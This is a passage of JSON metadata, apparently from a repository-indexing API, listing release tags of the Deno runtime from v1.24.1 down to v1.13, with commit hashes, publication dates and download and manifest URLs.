24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.